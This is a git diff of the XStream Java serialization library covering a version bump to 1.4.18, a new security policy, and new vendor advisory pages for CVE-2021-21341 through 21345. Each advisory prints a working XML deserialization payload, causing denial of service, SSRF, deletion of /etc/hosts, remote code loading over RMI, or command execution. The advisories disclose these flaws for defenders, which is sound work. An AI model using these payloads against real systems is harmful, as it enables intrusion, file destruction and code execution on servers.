diff --git a/SECURITY.md b/SECURITY.md
new file mode 100644
index 0000000000000000000000000000000000000000..4493f9ff554e0cc94128e724361adc10e6807b2a
--- /dev/null
+++ b/SECURITY.md
@@ -0,0 +1,20 @@
+# Security Policy
+
+## Supported Versions
+
+The 1.4.x version is actively maintained.
+
+| Version | Supported |
+| ------- | ------------------ |
+| 1.4.x | :white_check_mark: |
+| < 1.4.0 | :x: |
+
+## Reporting a Vulnerability
+
+If you have identified a security issue, ask on the [XStream mailing list](https://groups.google.com/group/xstream-user)
+for access to the XStream Security list and you will receive an invitation. Send a security report there with details to
+reproduce the problem with the latest XStream version.
+
+Note, that XStream cares about security issues with XStream itself or in combination with the Java runtime, but not with
+3rd party libraries. It is in the resposibility of each developer who brings those libraries together to setup the
+[XStream Security Framework](https://x-stream.github.io/security.html#framework) properly.
diff --git a/pom.xml b/pom.xml
index 2c5cb4302d14a182b1d91f973bc3f17da15d813b..19a331c3742977115c464014b589964fc5cb4eac 100644
--- a/pom.xml
+++ b/pom.xml
@@ -1,7 +1,7 @@
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
<!--
Copyright (C) 2006 Joe Walnes.
- Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2015, 2016, 2017, 2018, 2019, 2020 XStream committers.
+ Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2015, 2016, 2017, 2018, 2019, 2020, 2021 XStream committers.
All rights reserved.
The software in this package is published under the terms of the BSD
@@ -14,7 +14,7 @@
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-parent</artifactId>
<packaging>pom</packaging>
- <version>1.4.15</version>
+ <version>1.4.18</version>
<name>XStream Parent</name>
<url>http://x-stream.github.io</url>
<description>
@@ -410,12 +410,12 @@
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
<classifier>tests</classifier>
<type>test-jar</type>
<scope>test</scope>
@@ -423,43 +423,43 @@
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
<classifier>javadoc</classifier>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-hibernate</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-hibernate</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
<classifier>javadoc</classifier>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-jmh</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-jmh</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
<classifier>javadoc</classifier>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-benchmark</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
</dependency>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-benchmark</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
<classifier>javadoc</classifier>
<scope>provided</scope>
</dependency>
@@ -575,6 +575,11 @@
</exclusions>
</dependency>
+ <dependency>
+ <groupId>io.github.x-stream</groupId>
+ <artifactId>mxparser</artifactId>
+ <version>${version.io.github.x-stream.mxparser}</version>
+ </dependency>
<dependency>
<groupId>xpp3</groupId>
<artifactId>xpp3_min</artifactId>
@@ -1099,8 +1104,8 @@
<scm>
<url>http://github.com/x-stream/xstream</url>
- <developerConnection>scm:git:https://github.com/x-stream/xstream.git</developerConnection>
- <connection>scm:git:https://github.com/x-stream/xstream.git</connection>
+ <developerConnection>scm:git:ssh://git@github.com/x-stream/xstream.git</developerConnection>
+ <connection>scm:git:ssh://git@github.com/x-stream/xstream.git</connection>
<tag>v-1.4.x</tag>
</scm>
@@ -1123,7 +1128,7 @@
<version.plugin.maven.deploy>2.3</version.plugin.maven.deploy>
<version.plugin.maven.enforcer>1.4</version.plugin.maven.enforcer>
<version.plugin.maven.failsafe>2.22.0</version.plugin.maven.failsafe>
- <version.plugin.maven.gpg>1.6</version.plugin.maven.gpg>
+ <version.plugin.maven.gpg>3.0.1</version.plugin.maven.gpg>
<version.plugin.maven.install>2.2</version.plugin.maven.install>
<version.plugin.maven.jar>2.2</version.plugin.maven.jar>
<version.plugin.maven.javadoc>2.10</version.plugin.maven.javadoc>
@@ -1146,6 +1151,7 @@
<version.commons.lang>2.4</version.commons.lang>
<version.dom4j>1.6.1</version.dom4j>
<version.hsqldb>2.2.8</version.hsqldb>
+ <version.io.github.x-stream.mxparser>1.2.2</version.io.github.x-stream.mxparser>
<version.javaassist>3.12.1.GA</version.javaassist>
<version.javax.activation>1.1.1</version.javax.activation>
<version.javax.annotation.api>1.3.2</version.javax.annotation.api>
diff --git a/xstream-benchmark/pom.xml b/xstream-benchmark/pom.xml
index 724aaf552c1a0d94b5b49a0925610ed377e25719..7e87319b03e9845917d99c62e9235a95c7128ec7 100644
--- a/xstream-benchmark/pom.xml
+++ b/xstream-benchmark/pom.xml
@@ -14,7 +14,7 @@
<parent>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-parent</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
</parent>
<artifactId>xstream-benchmark</artifactId>
<packaging>jar</packaging>
diff --git a/xstream-distribution/pom.xml b/xstream-distribution/pom.xml
index 215495096d2ebdccb824d254324f5c91d1f0fd7d..bf33681da3a2ea259a9f903cff0bab6f34844f18 100644
--- a/xstream-distribution/pom.xml
+++ b/xstream-distribution/pom.xml
@@ -14,7 +14,7 @@
<parent>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream-parent</artifactId>
- <version>1.4.15</version>
+ <version>1.4.18</version>
</parent>
<artifactId>xstream-distribution</artifactId>
<packaging>pom</packaging>
diff --git a/xstream-distribution/src/content/CVE-2020-26217.html b/xstream-distribution/src/content/CVE-2020-26217.html
index 0d6670a1457ead742d961aecb3ee5d0b364dfeca..48f1ea3195425ba4edf6dd70cf6e331249cbe1db 100644
--- a/xstream-distribution/src/content/CVE-2020-26217.html
+++ b/xstream-distribution/src/content/CVE-2020-26217.html
@@ -134,7 +134,7 @@ xstream.denyTypes(new Class[]{ java.lang.ProcessBuilder.class, java.beans.EventH
public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
throw new ConversionException("Unsupported type due to security reasons.");
}
-}, XStream.PRIORITY_LOW);
+}, XStream.PRIORITY_VERY_HIGH);
</pre></div>
<h2 id="credits">Credits</h2>
diff --git a/xstream-distribution/src/content/CVE-2020-26258.html b/xstream-distribution/src/content/CVE-2020-26258.html
index 61777c2e67f34bb5ad9022862b2c2acedd52dfc3..e71888ca472b291be642b1f1faefc16d6720564d 100644
--- a/xstream-distribution/src/content/CVE-2020-26258.html
+++ b/xstream-distribution/src/content/CVE-2020-26258.html
@@ -104,7 +104,7 @@ xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..
public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
throw new ConversionException("Unsupported type due to security reasons.");
}
-}, XStream.PRIORITY_LOW);
+}, XStream.PRIORITY_VERY_HIGH);
</pre></div>
<h2 id="credits">Credits</h2>
diff --git a/xstream-distribution/src/content/CVE-2020-26259.html b/xstream-distribution/src/content/CVE-2020-26259.html
index a3365901e3caa0361619666923bd2847000543a3..64bdaf6e261407d4c85b9840c6453762dfea05f4 100644
--- a/xstream-distribution/src/content/CVE-2020-26259.html
+++ b/xstream-distribution/src/content/CVE-2020-26259.html
@@ -29,7 +29,7 @@
<p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
- input stream and replace or inject objects, that result in a server-side forgery request.</p>
+ input stream and replace or inject objects, that result in the deletion of a file on the local host.</p>
<h2 id="reproduction">Steps to Reproduce</h2>
@@ -60,7 +60,7 @@
xstream.fromXML(xml);
</pre></div>
- <p>As soon as the XML gets unmarshalled, the payload gets executed and the references file is deleted.</p>
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the referenced file is deleted.</p>
<p>Note, this example uses XML, but the attack can be performed for any supported format, e.g. JSON.</p>
@@ -107,7 +107,7 @@ xstream.denyTypesByRegExp(new String[]{ ".*\\$LazyIterator", "javax\\.crypto\\..
public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
throw new ConversionException("Unsupported type due to security reasons.");
}
-}, XStream.PRIORITY_LOW);
+}, XStream.PRIORITY_VERY_HIGH);
</pre></div>
<h2 id="credits">Credits</h2>
diff --git a/xstream-distribution/src/content/CVE-2021-21341.html b/xstream-distribution/src/content/CVE-2021-21341.html
new file mode 100644
index 0000000000000000000000000000000000000000..02b8d3830d3bd53702073aa6b74218dc0003f7ce
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21341.html
@@ -0,0 +1,89 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 10. January 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21341</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21341: XStream can cause a Denial of Service.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject a manipulated ByteArrayInputStream (or derived class), that can cause an endless
+ loop resulting in a denial of service.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='javafx.collections.ObservableList$1'/>
+ </default>
+ <int>3</int>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <dataHandler>
+ <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
+ <is class='java.io.ByteArrayInputStream'>
+ <buf></buf>
+ <pos>-2147483648</pos>
+ <mark>0</mark>
+ <count>0</count>
+ </is>
+ <consumed>false</consumed>
+ </dataSource>
+ <transferFlavors/>
+ </dataHandler>
+ <dataLen>0</dataLen>
+ </com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
+ <com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the an endless loop is entered and the executing thread consumes maximum
+ CPU time and will never return.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU
+ type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed
+ input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>The vulnerability was discovered and reported by threedr3am.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21342.html b/xstream-distribution/src/content/CVE-2021-21342.html
new file mode 100644
index 0000000000000000000000000000000000000000..b4e9205b7191cee0a6fe8a4ed745297074dcade3
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21342.html
@@ -0,0 +1,83 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 12. January 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21342</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21342: A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams
+ from an arbitrary URL referencing a resource in an intranet or the local host.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in a server-side forgery request.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
+ <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
+ <packet>
+ <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
+ <dataSource class='javax.activation.URLDataSource'>
+ <url>http://localhost:8080/internal/</url>
+ </dataSource>
+ </message>
+ </packet>
+ </indexMap>
+ </comparator>
+ </default>
+ <int>3</int>
+ <string>javax.xml.ws.binding.attachments.inbound</string>
+ <string>javax.xml.ws.binding.attachments.inbound</string>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the data from the URL location is collected.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to request data from internal resources that are not publicly
+ available only by manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21343.html b/xstream-distribution/src/content/CVE-2021-21343.html
new file mode 100644
index 0000000000000000000000000000000000000000..b5a02fbb6bb99397bded1938efb5acffcde722fb
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21343.html
@@ -0,0 +1,127 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 16. January 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21343</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21343: XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long
+ as the executing process has sufficient rights.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in the deletion of a file on the local host.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
+ <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
+ <packet>
+ <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
+ <dataSource class='com.sun.xml.internal.ws.encoding.MIMEPartStreamingDataHandler$StreamingDataSource'>
+ <part>
+ <dataHead>
+ <tail/>
+ <head>
+ <data class='com.sun.xml.internal.org.jvnet.mimepull.MemoryData'>
+ <len>3</len>
+ <data>AQID</data>
+ </data>
+ </head>
+ </dataHead>
+ <contentTransferEncoding>base64</contentTransferEncoding>
+ <msg>
+ <it class='java.util.ArrayList$Itr'>
+ <cursor>0</cursor>
+ <lastRet>1</lastRet>
+ <expectedModCount>4</expectedModCount>
+ <outer-class>
+ <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
+ <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
+ <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
+ <com.sun.xml.internal.org.jvnet.mimepull.MIMEEvent_-EndMessage/>
+ </outer-class>
+ </it>
+ <in class='java.io.FileInputStream'>
+ <fd/>
+ <channel class='sun.nio.ch.FileChannelImpl'>
+ <closeLock/>
+ <open>true</open>
+ <threads>
+ <used>-1</used>
+ </threads>
+ <parent class='sun.plugin2.ipc.unix.DomainSocketNamedPipe'>
+ <sockClient>
+ <fileName>/etc/hosts</fileName>
+ <unlinkFile>true</unlinkFile>
+ </sockClient>
+ <connectionSync/>
+ </parent>
+ </channel>
+ <closeLock/>
+ </in>
+ </msg>
+ </part>
+ </dataSource>
+ </message>
+ <satellites/>
+ <invocationProperties/>
+ </packet>
+ </indexMap>
+ </comparator>
+ </default>
+ <int>3</int>
+ <string>javax.xml.ws.binding.attachments.inbound</string>
+ <string>javax.xml.ws.binding.attachments.inbound</string>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the references file is deleted.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to delete arbitrary know files on the host as log as the executing
+ process has sufficient rights only by manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21344.html b/xstream-distribution/src/content/CVE-2021-21344.html
new file mode 100644
index 0000000000000000000000000000000000000000..c5614c3dc1ed31115dc4cbc6ac1d2e8c5fd00b3a
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21344.html
@@ -0,0 +1,163 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 19. January 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21344</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21344: XStream is vulnerable to an Arbitrary Code Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
+ <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
+ <packet>
+ <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
+ <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
+ <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
+ <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
+ <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
+ <jaxbType>com.sun.rowset.JdbcRowSetImpl</jaxbType>
+ <uriProperties/>
+ <attributeProperties/>
+ <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
+ <getter>
+ <class>com.sun.rowset.JdbcRowSetImpl</class>
+ <name>getDatabaseMetaData</name>
+ <parameter-types/>
+ </getter>
+ </inheritedAttWildcard>
+ </bi>
+ <tagName/>
+ <context>
+ <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
+ <outer-class reference='../..'/>
+ </marshallerPool>
+ <nameList>
+ <nsUriCannotBeDefaulted>
+ <boolean>true</boolean>
+ </nsUriCannotBeDefaulted>
+ <namespaceURIs>
+ <string>1</string>
+ </namespaceURIs>
+ <localNames>
+ <string>UTF-8</string>
+ </localNames>
+ </nameList>
+ </context>
+ </bridge>
+ </bridge>
+ <jaxbObject class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
+ <javax.sql.rowset.BaseRowSet>
+ <default>
+ <concurrency>1008</concurrency>
+ <escapeProcessing>true</escapeProcessing>
+ <fetchDir>1000</fetchDir>
+ <fetchSize>0</fetchSize>
+ <isolation>2</isolation>
+ <maxFieldSize>0</maxFieldSize>
+ <maxRows>0</maxRows>
+ <queryTimeout>0</queryTimeout>
+ <readOnly>true</readOnly>
+ <rowSetType>1004</rowSetType>
+ <showDeleted>false</showDeleted>
+ <dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>
+ <params/>
+ </default>
+ </javax.sql.rowset.BaseRowSet>
+ <com.sun.rowset.JdbcRowSetImpl>
+ <default>
+ <iMatchColumns>
+ <int>-1</int>
+ <int>-1</int>
+ <int>-1</int>
+ <int>-1</int>
+ <int>-1</int>
+ <int>-1</int>
+ <int>-1</int>
+ <int>-1</int>
+ <int>-1</int>
+ <int>-1</int>
+ </iMatchColumns>
+ <strMatchColumns>
+ <string>foo</string>
+ <null/>
+ <null/>
+ <null/>
+ <null/>
+ <null/>
+ <null/>
+ <null/>
+ <null/>
+ <null/>
+ </strMatchColumns>
+ </default>
+ </com.sun.rowset.JdbcRowSetImpl>
+ </jaxbObject>
+ </dataSource>
+ </message>
+ <satellites/>
+ <invocationProperties/>
+ </packet>
+ </indexMap>
+ </comparator>
+ </default>
+ <int>3</int>
+ <string>javax.xml.ws.binding.attachments.inbound</string>
+ <string>javax.xml.ws.binding.attachments.inbound</string>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the code from the remote server is loaded and executed.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by
+ manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
diff --git a/xstream-distribution/src/content/CVE-2021-21345.html b/xstream-distribution/src/content/CVE-2021-21345.html
new file mode 100644
index 0000000000000000000000000000000000000000..4f027690e3c5d1df1d98af07a977e8c8e143f292
--- /dev/null
+++ b/xstream-distribution/src/content/CVE-2021-21345.html
@@ -0,0 +1,119 @@
+<html>
+<!--
+ Copyright (C) 2021 XStream committers.
+ All rights reserved.
+
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+
+ Created on 26. January 2021 by Joerg Schaible
+ -->
+ <head>
+ <title>CVE-2021-21345</title>
+ </head>
+ <body>
+
+ <h2 id="vulnerability">Vulnerability</h2>
+
+ <p>CVE-2021-21345: XStream is vulnerable to a Remote Command Execution attack.</p>
+
+ <h2 id="affected_versions">Affected Versions</h2>
+
+ <p>All versions until and including version 1.4.15 are affected, if using the version out of the box. No user is
+ affected, who followed the recommendation to setup <a href="security.html#framework">XStream's security
+ framework</a> with a whitelist limited to the minimal required types.</p>
+
+ <h2 id="description">Description</h2>
+
+ <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+ XStream creates therefore new instances based on these type information. An attacker can manipulate the processed
+ input stream and replace or inject objects, that result in execution of a local command on the server.</p>
+
+ <h2 id="reproduction">Steps to Reproduce</h2>
+
+ <p>Create a simple PriorityQueue and use XStream to marshal it to XML. Replace the XML with following snippet and
+ unmarshal it again with XStream:</p>
+<div class="Source XML"><pre><java.util.PriorityQueue serialization='custom'>
+ <unserializable-parents/>
+ <java.util.PriorityQueue>
+ <default>
+ <size>2</size>
+ <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
+ <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
+ <packet>
+ <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
+ <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
+ <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
+ <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
+ <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
+ <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>
+ <uriProperties/>
+ <attributeProperties/>
+ <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
+ <getter>
+ <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>
+ <name>verify</name>
+ <parameter-types/>
+ </getter>
+ </inheritedAttWildcard>
+ </bi>
+ <tagName/>
+ <context>
+ <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
+ <outer-class reference='../..'/>
+ </marshallerPool>
+ <nameList>
+ <nsUriCannotBeDefaulted>
+ <boolean>true</boolean>
+ </nsUriCannotBeDefaulted>
+ <namespaceURIs>
+ <string>1</string>
+ </namespaceURIs>
+ <localNames>
+ <string>UTF-8</string>
+ </localNames>
+ </nameList>
+ </context>
+ </bridge>
+ </bridge>
+ <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>
+ <activationCmd>calc</activationCmd>
+ </jaxbObject>
+ </dataSource>
+ </message>
+ <satellites/>
+ <invocationProperties/>
+ </packet>
+ </indexMap>
+ </comparator>
+ </default>
+ <int>3</int>
+ <string>javax.xml.ws.binding.attachments.inbound</string>
+ <string>javax.xml.ws.binding.attachments.inbound</string>
+ </java.util.PriorityQueue>
+</java.util.PriorityQueue>
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+xstream.fromXML(xml);
+</pre></div>
+
+ <p>As soon as the XML gets unmarshalled, the payload gets executed and the command is executed on the host.</p>
+
+ <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+ <h2 id="impact">Impact</h2>
+
+ <p>The vulnerability may allow a remote attacker has sufficient rights to execute commands of the host only by
+ manipulating the processed input stream.</p>
+
+ <h2 id="workarounds">Workarounds</h2>
+
+ <p>See <a href="security.html#workaround">workarounds</a> for the different versions covering all CVEs.</p>
+
+ <h2 id="credits">Credits</h2>
+
+ <p>钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.</p>
+
+ </body>
+ </html>
